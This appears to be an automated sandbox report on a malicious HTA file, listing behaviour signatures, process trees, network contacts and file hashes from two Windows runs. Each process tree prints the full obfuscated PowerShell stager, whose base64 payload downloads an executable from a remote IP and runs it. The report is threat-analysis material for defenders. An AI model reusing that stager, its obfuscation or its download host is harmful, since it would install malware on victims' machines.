Analysis Overview
SHA256
5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546
Threat Level: Likely malicious
The file seethebestthingswithgreatthingsbestthingswithgreatentry.hta was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Downloads MZ/PE file
Evasion via Device Credential Deployment
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
AutoIT Executable
Suspicious use of SetThreadContext
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 07:32
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 07:32
Reported
2024-11-13 07:34
Platform
win7-20240903-en
Max time kernel
122s
Max time network
122s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
Downloads MZ/PE file
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\wlanext.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2672 set thread context of 2300 | N/A | C:\Users\Admin\AppData\Roaming\wlanext.exe | C:\Windows\SysWOW64\svchost.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\wlanext.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\wlanext.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingswithgreatthingsbestthingswithgreatentry.hta"
C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
"C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'JEMzV3NmSEMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVyZEVGSU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1ByeSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJcWloU2dPcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3l3UmhuUUdmS1IsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV2JKYUdNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiV25XVCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkQzNXc2ZIQzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzMuNC42MS8zNDUvd2xhbmV4dHMuZXhlIiwiJEVOdjpBUFBEQVRBXHdsYW5leHQuZXhlIiwwLDApO3NUQVJULXNsZUVwKDMpO3NUYXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSI='+[chaR]0X22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\utu7hahj.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8D33.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8D32.tmp"
C:\Users\Admin\AppData\Roaming\wlanext.exe
"C:\Users\Admin\AppData\Roaming\wlanext.exe"
C:\Windows\SysWOW64\svchost.exe
"C:\Users\Admin\AppData\Roaming\wlanext.exe"
Network
| Country | Destination | Domain | Proto |
| US | 107.173.4.61:80 | 107.173.4.61 | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 613d7cdc2b28524fb662528ebdfbf8d2 |
| SHA1 | ccbc1d360f44de08d51496e8aa9a97286665cc81 |
| SHA256 | b6c7ee152eca86efd07b20eb031036d300c448633037cb0a23ff1996afd219a1 |
| SHA512 | bd8e101cf662c80164caed51b07e5521ae3601bc2bfdbf73a67d8687a92efae18459be88af533f09efc49a6f8f7b3da0ecaafb543819e50794f4f12212fcec0e |
\??\c:\Users\Admin\AppData\Local\Temp\utu7hahj.cmdline
| MD5 | d1237e9b54786c19a7dc2f3d5063ace9 |
| SHA1 | 87fb71a3bf8b459d504e6fa64e64b3e090e0a340 |
| SHA256 | 9683e7214772ac18f83fddce50409046d605f31f3259801cb9d9c10a2d9a2a0d |
| SHA512 | a37f8622f2d5b7be68121530a31d6b987d8bae13c626d6bb5ffb25dfd121068133f03c61afff4b88e42788bf8c43650edc03d806cf0d5d1fefd7b9922886f373 |
\??\c:\Users\Admin\AppData\Local\Temp\utu7hahj.0.cs
| MD5 | 4af98cbe7b888e1e92e1aa8a35732223 |
| SHA1 | 75d54c91355c97fc9b1c3453efea5dccd817ed42 |
| SHA256 | 596b94a3cb934e9261ddf50733d26c0147c5cb57e1215cabed32fee719782f34 |
| SHA512 | 1127001fd6eb53db939188df14cdd466f44103d8386e51ffaeaaa56569e137367388097c37422fbe332f6b7ced9f4959058f1235f106efcc03e492e009705ff3 |
\??\c:\Users\Admin\AppData\Local\Temp\CSC8D32.tmp
| MD5 | 66d8d2dfe001de4d4e8f81fc35f06931 |
| SHA1 | 6664cf4d0590f29de319bbb9890a85c2829b89ed |
| SHA256 | 3ab0fb6fd8f5d00eb6dbadb2f289f4dd6510d492cb0b7b20487a80716f6ebdf7 |
| SHA512 | 152e09695ac3c88ca45dc03556329eb012e11f98e678a61fb0b852b6242b12e8ee08f66f055ab3ea5f8ddd2cbac6f054a1011f4bd51462a4346420c220101066 |
C:\Users\Admin\AppData\Local\Temp\RES8D33.tmp
| MD5 | f6382cf166635d79677234beb37053e5 |
| SHA1 | 8579fc096080813fbfab3eed9e220b658d0f0de0 |
| SHA256 | 37a7e10da6d118a316ec2762f7f5eef1f6e5dcc66f0f9e4c39e8aea5400e33d3 |
| SHA512 | b631a63fe7c62260591f6ee9993656fb135b01bcbbe066a43518c8a3a1d97380323da7f60362d79ff0b4ddd0d3e4855ce9d839fed4a2df04913b02d9e44a4b5b |
C:\Users\Admin\AppData\Local\Temp\utu7hahj.dll
| MD5 | adf417c79e94d2cdce28073c4b2233af |
| SHA1 | 6ecce128a7d3cb7053efec9eb30da28b1bf6c56b |
| SHA256 | e5a43b30261078a571d27c447cbd61ffcfb6a301e9b6f8144c22b72b54196870 |
| SHA512 | 1d11c92bae92e4b7fad9837e223aca29350268142baf0dc52eae2034018b7be859e337ee30eb4c604149764c3f2dc5c1c2c7edf7134b1e664fd46749a67c9105 |
C:\Users\Admin\AppData\Local\Temp\utu7hahj.pdb
| MD5 | fb1f4a558fed58915412c8948ec94b77 |
| SHA1 | d92a257761de843867d4a2631074a197ce5fa8e3 |
| SHA256 | cb4f08215d951f1b2ed21d5cbc98523c3e2c6c67384c933500a42449d9aa236c |
| SHA512 | 754f0554e577d89202ca6d6905156b80abc624c463c1e4c6090baf9f8a75b66e33b18a070f9d860ae8b7520728066e07ac8e3084ff53742540817d32f6c707dd |
C:\Users\Admin\AppData\Roaming\wlanext.exe
| MD5 | 7423e3013a2ca93513e9f1024dfe1cc8 |
| SHA1 | 525281537f75c168ca4015df438bb83a7784931a |
| SHA256 | 8e3951372f996dd248695a54af7ff1a5cde1059689aa43d953712e6c0744c0df |
| SHA512 | d5189a52b0cb9db2da33b7d8a61278e5e8edf0d1f075695dc5e99178e47b319658f8cf3e8339ee8bf24c548b3a38c01265250edf173f368dbea062ada78baea0 |
C:\Users\Admin\AppData\Local\Temp\juvenilely
| MD5 | 5fc0e7bec89d9a4e021d88dd1cf731b2 |
| SHA1 | 26ea02938cb1eb51a1ac601ab1b068a130cc3719 |
| SHA256 | 532d407f3bdbd28145b385a4e15c80117e07e89f2ba16f1f620fe20cf213783d |
| SHA512 | 1c54091984fb41f43dbf7c7676184482ca853fb33e41780a323aec0ca21759e2a91af3bff30a947579811882d1c710a138e7e57dea2d9790e5092e68b768664f |
memory/2300-44-0x0000000000400000-0x0000000000447000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 07:32
Reported
2024-11-13 07:34
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Blocklisted process makes network request
Downloads MZ/PE file
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\wlanext.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 540 set thread context of 4744 | N/A | C:\Users\Admin\AppData\Roaming\wlanext.exe | C:\Windows\SysWOW64\svchost.exe |
| PID 4744 set thread context of 4368 | N/A | C:\Windows\SysWOW64\svchost.exe | C:\Windows\SysWOW64\mshta.exe |
| PID 4744 set thread context of 2060 | N/A | C:\Windows\SysWOW64\svchost.exe | C:\Windows\SysWOW64\mstsc.exe |
| PID 2060 set thread context of 4368 | N/A | C:\Windows\SysWOW64\mstsc.exe | C:\Windows\SysWOW64\mshta.exe |
| PID 2060 set thread context of 1380 | N/A | C:\Windows\SysWOW64\mstsc.exe | C:\Program Files\Mozilla Firefox\Firefox.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\wlanext.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mstsc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \Registry\User\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 | C:\Windows\SysWOW64\mstsc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\wlanext.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mstsc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mstsc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mstsc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mstsc.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingswithgreatthingsbestthingswithgreatentry.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
"C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'JEMzV3NmSEMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVyZEVGSU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1ByeSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJcWloU2dPcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3l3UmhuUUdmS1IsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV2JKYUdNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiV25XVCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkQzNXc2ZIQzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzMuNC42MS8zNDUvd2xhbmV4dHMuZXhlIiwiJEVOdjpBUFBEQVRBXHdsYW5leHQuZXhlIiwwLDApO3NUQVJULXNsZUVwKDMpO3NUYXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSI='+[chaR]0X22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lzzzoozl\lzzzoozl.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCDEF.tmp" "c:\Users\Admin\AppData\Local\Temp\lzzzoozl\CSC5E4A05AEE662450799A3E9EDCFB70B1.TMP"
C:\Users\Admin\AppData\Roaming\wlanext.exe
"C:\Users\Admin\AppData\Roaming\wlanext.exe"
C:\Windows\SysWOW64\svchost.exe
"C:\Users\Admin\AppData\Roaming\wlanext.exe"
C:\Windows\SysWOW64\mstsc.exe
"C:\Windows\SysWOW64\mstsc.exe"
C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 107.173.4.61:80 | 107.173.4.61 | tcp |
| US | 8.8.8.8:53 | 61.4.173.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.sodatool.site | udp |
| CN | 122.152.214.209:80 | www.sodatool.site | tcp |
| US | 8.8.8.8:53 | www.wwwzbk.app | udp |
| HK | 202.95.12.144:80 | www.wwwzbk.app | tcp |
| US | 8.8.8.8:53 | 144.12.95.202.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.fichier-nt-pdf.store | udp |
| LT | 84.32.84.32:80 | www.fichier-nt-pdf.store | tcp |
| US | 8.8.8.8:53 | 32.84.32.84.in-addr.arpa | udp |
| LT | 84.32.84.32:80 | www.fichier-nt-pdf.store | tcp |
| LT | 84.32.84.32:80 | www.fichier-nt-pdf.store | tcp |
| LT | 84.32.84.32:80 | www.fichier-nt-pdf.store | tcp |
| LT | 84.32.84.32:80 | www.fichier-nt-pdf.store | tcp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.princos.info | udp |
| US | 203.161.46.205:80 | www.princos.info | tcp |
| US | 8.8.8.8:53 | 205.46.161.203.in-addr.arpa | udp |
| US | 203.161.46.205:80 | www.princos.info | tcp |
| US | 203.161.46.205:80 | www.princos.info | tcp |
| US | 203.161.46.205:80 | www.princos.info | tcp |
| US | 203.161.46.205:80 | www.princos.info | tcp |
| US | 8.8.8.8:53 | www.betmatchx.online | udp |
| UA | 91.206.201.136:80 | www.betmatchx.online | tcp |
| US | 8.8.8.8:53 | 136.201.206.91.in-addr.arpa | udp |
| UA | 91.206.201.136:80 | www.betmatchx.online | tcp |
| UA | 91.206.201.136:80 | www.betmatchx.online | tcp |
| UA | 91.206.201.136:80 | www.betmatchx.online | tcp |
| UA | 91.206.201.136:80 | www.betmatchx.online | tcp |
| US | 8.8.8.8:53 | www.matteicapital.online | udp |
| US | 208.91.197.27:80 | www.matteicapital.online | tcp |
| US | 8.8.8.8:53 | 27.197.91.208.in-addr.arpa | udp |
| US | 208.91.197.27:80 | www.matteicapital.online | tcp |
| US | 208.91.197.27:80 | www.matteicapital.online | tcp |
| US | 208.91.197.27:80 | www.matteicapital.online | tcp |
| US | 208.91.197.27:80 | www.matteicapital.online | tcp |
| US | 8.8.8.8:53 | www.prestigerugz.info | udp |
| DE | 217.160.0.113:80 | www.prestigerugz.info | tcp |
| US | 8.8.8.8:53 | 113.0.160.217.in-addr.arpa | udp |
| DE | 217.160.0.113:80 | www.prestigerugz.info | tcp |
| DE | 217.160.0.113:80 | www.prestigerugz.info | tcp |
| US | 8.8.8.8:53 | udp |
Files
memory/860-0-0x0000000070EEE000-0x0000000070EEF000-memory.dmp
memory/860-1-0x00000000027C0000-0x00000000027F6000-memory.dmp
memory/860-3-0x0000000005340000-0x0000000005968000-memory.dmp
memory/860-2-0x0000000070EE0000-0x0000000071690000-memory.dmp
memory/860-4-0x0000000005170000-0x0000000005192000-memory.dmp
memory/860-6-0x0000000005AE0000-0x0000000005B46000-memory.dmp
memory/860-5-0x0000000005290000-0x00000000052F6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4emfy4h5.qmu.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/860-16-0x0000000005B50000-0x0000000005EA4000-memory.dmp
memory/860-17-0x0000000006100000-0x000000000611E000-memory.dmp
memory/860-18-0x0000000006120000-0x000000000616C000-memory.dmp
memory/1632-29-0x000000006D7A0000-0x000000006D7EC000-memory.dmp
memory/1632-28-0x0000000006300000-0x0000000006332000-memory.dmp
memory/1632-39-0x0000000006EF0000-0x0000000006F0E000-memory.dmp
memory/1632-40-0x0000000006F30000-0x0000000006FD3000-memory.dmp
memory/1632-41-0x00000000076A0000-0x0000000007D1A000-memory.dmp
memory/1632-42-0x0000000007060000-0x000000000707A000-memory.dmp
memory/1632-43-0x00000000070C0000-0x00000000070CA000-memory.dmp
memory/1632-44-0x00000000072F0000-0x0000000007386000-memory.dmp
memory/1632-45-0x0000000007260000-0x0000000007271000-memory.dmp
memory/1632-46-0x0000000007290000-0x000000000729E000-memory.dmp
memory/1632-47-0x00000000072A0000-0x00000000072B4000-memory.dmp
memory/1632-48-0x00000000073B0000-0x00000000073CA000-memory.dmp
memory/1632-49-0x00000000072E0000-0x00000000072E8000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\lzzzoozl\lzzzoozl.cmdline
| MD5 | 744bf541171f1e1bbaa2092eb9dac51e |
| SHA1 | 2721a9e3fa7254d57001fb0381c63afffb5f40f6 |
| SHA256 | 93ccc5b8f167de57da742d2026c1c68e2ab921aa60b38f4ff720cf5ff302f23c |
| SHA512 | f89c331ec2ee7b3babd31607ee4281c944b8b33d7789aa0e473281596494a40eed0760dac271ba44cd9033fb8afb8f0a299e48ef7f2b9bca6b241f474e19ce1d |
\??\c:\Users\Admin\AppData\Local\Temp\lzzzoozl\lzzzoozl.0.cs
| MD5 | 4af98cbe7b888e1e92e1aa8a35732223 |
| SHA1 | 75d54c91355c97fc9b1c3453efea5dccd817ed42 |
| SHA256 | 596b94a3cb934e9261ddf50733d26c0147c5cb57e1215cabed32fee719782f34 |
| SHA512 | 1127001fd6eb53db939188df14cdd466f44103d8386e51ffaeaaa56569e137367388097c37422fbe332f6b7ced9f4959058f1235f106efcc03e492e009705ff3 |
\??\c:\Users\Admin\AppData\Local\Temp\lzzzoozl\CSC5E4A05AEE662450799A3E9EDCFB70B1.TMP
| MD5 | be33b43dc0a0d0ee9e8d8611ff12d29e |
| SHA1 | 79e45ab90c76582617857f1eda0694fce579c0f1 |
| SHA256 | a062ff40d8dc0c461ae2fdd134811b9c73ac332899b6fbb7eb42ffcf2e8a0cdd |
| SHA512 | cff8adfedb156940b0bd49bd0fb918dd38884bc611feab5d70aa20d100495802a2649b4726e85669246b864c2ea529646e6ce35677913b5d7c78611267a3fc99 |
C:\Users\Admin\AppData\Local\Temp\RESCDEF.tmp
| MD5 | f4716bfe1bd302f1b918187fa8b23a63 |
| SHA1 | 738656598aad26b102a02ed4faaafce1c8233c9b |
| SHA256 | 8633ce07fce1d7b0738c0b6db11893322d0e4d6e77438a2be19f117836efdad7 |
| SHA512 | 092fb24eff474672bf06a82589df913807e8e40bc4ab366a957540b6dba1683f42e61104a2d3ed10d1967040bad26c7d67b2c7906e6b57ef112966eaa759d37b |
C:\Users\Admin\AppData\Local\Temp\lzzzoozl\lzzzoozl.dll
| MD5 | e17a0872ce502543e77128998863fa8b |
| SHA1 | 3a0c88f8827eb9966c24cffbdc54174ac64c1f3c |
| SHA256 | 601d211643c9c809c9c0264cee2a1687627c4f1a4ef8890f08fa73cf24bd0db8 |
| SHA512 | 77139ac6c8c6d31f2377282e86100dc3d0e9078242c7b6eb81517fd7be57490919e3c58a5c52aed982c314d0f144ad20e9e74f683b929b74e000398793f52aae |
